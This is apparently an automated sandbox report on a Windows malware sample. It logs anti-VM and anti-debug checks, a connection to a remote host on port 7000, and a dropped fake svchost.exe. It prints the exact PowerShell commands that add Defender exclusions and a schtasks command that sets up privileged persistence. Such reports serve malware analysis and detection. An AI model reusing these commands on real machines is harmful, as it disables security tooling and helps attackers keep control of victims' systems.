                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

Source: global traffic -- HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Source: C:\Users\user\AppData\Roaming\svchost.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: All function.exe, 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: SBIEDLL.DLL
Source: file.exe, 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, svchost.exe.0.dr -- Binary or memory string: SBIEDLL.DLLEF2TM6EI7BFXPX3GLXOMH4VTAFPF20UKO0S73JUDVEV21Q32MTBELASD866LCU32CDJRMIP4DNZ0LZIJKVPVQNIBFKIYYEEP71OXOXELM4CSZ9WVZ3RA4CY8B4ME4J9B5CQAQMV9URHZ2Z3MAGWCEW1RYEDD1H7NYCW4BJZSAKWQPX2HQWDYG5OBASDJF2SY1KSVU3YBIJA3ECZEKCEFQ6ZCWIRFABI3IONFL6UXQDRQCJ1UAS1DP0TC2MJ1JNJE2ELMCPVARDWIHP8IKOFNBZ2TR6I9W6FWDSOGT0MAHXXMJ48DOCEFDHMCSSZZV5H397082KZCSPSXDN5NOEMU08DND9LLCL4NCKLS4
Source: C:\Users\user\Desktop\file.exe -- Memory allocated: 3590000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe -- Memory allocated: 1B880000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\All function.exe -- Memory allocated: 1ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\All function.exe -- Memory allocated: 1B8C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 2D20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 1AD20000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 940000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 1A4A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 1290000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 7F0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Memory allocated: 1A7A0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\file.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\All function.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Window / User API: threadDelayed 2830
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Window / User API: threadDelayed 6999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 5012
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 4754
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 7766
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 1758
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 7172
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 2555
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 5908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3866
Source: C:\Users\user\Desktop\file.exe TID: 6956 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\All function.exe TID: 1824 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4644 -- Thread sleep time: -33204139332677172s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 736 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188 -- Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4688 -- Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112 -- Thread sleep count: 7172 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6092 -- Thread sleep count: 2555 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036 -- Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 -- Thread sleep count: 5908 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 -- Thread sleep count: 3866 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2564 -- Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3476 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 3608 -- Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\svchost.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\All function.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Thread delayed: delay time: 922337203685477
Source: svchost.exe.0.dr -- Binary or memory string: vmware
Source: svchost.exe, 00000003.00000002.2795781250.000000001BE00000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrip
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process information queried: ProcessInformation

                  Anti Debugging

Source: C:\Users\user\AppData\Roaming\svchost.exe -- Code function: 3_2_00007FF7C0CC7A81 CheckRemoteDebuggerPresent, 3_2_00007FF7C0CC7A81
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe -- Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\svchost.exe -- Network Connect: 208.95.112.1 80
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Network Connect: 45.141.26.134 7000
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\Desktop\file.exe -- Process created: C:\Users\user\AppData\Roaming\All function.exe "C:\Users\user\AppData\Roaming\All function.exe"
Source: C:\Users\user\Desktop\file.exe -- Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe -- Process created: C:\Users\user\AppData\Roaming\ALL slumzick.exe "C:\Users\user\AppData\Roaming\ALL slumzick.exe"
Source: C:\Users\user\AppData\Roaming\All function.exe -- Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\Desktop\file.exe -- Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\All function.exe -- Queries volume information: C:\Users\user\AppData\Roaming\All function.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\svchost.exe -- Queries volume information: C:\Users\user\AppData\Roaming\svchost.exe VolumeInformation
